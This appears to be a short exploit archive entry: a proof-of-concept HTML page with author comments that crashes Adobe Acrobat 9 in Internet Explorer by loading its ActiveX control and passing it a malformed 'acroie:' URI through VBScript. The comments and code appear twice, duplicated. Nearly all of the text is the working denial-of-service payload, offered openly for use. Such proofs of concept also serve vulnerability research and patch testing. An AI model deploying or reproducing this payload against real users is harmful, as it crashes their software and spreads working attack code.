Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
I can't seem to reproduce this on XP! Oh well.
Of course the most popular app for reading pdfs is SfS/SfI :)
Basically it will crash with any uri that adobe doesn't like.
Also interesting: try with file:///DoS and look in bottom left area --> <html><body> <object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript> arg1="acroie:///DoS"
target.src = arg1 </script>
</body></html>
Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
I can't seem to reproduce this on XP! Oh well.
Of course the most popular app for reading pdfs is SfS/SfI :)
Basically it will crash with any uri that adobe doesn't like.
Also interesting: try with file:///DoS and look in bottom left area --> <html><body> <object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript> arg1="acroie:///DoS"
target.src = arg1 </script>
</body></html>
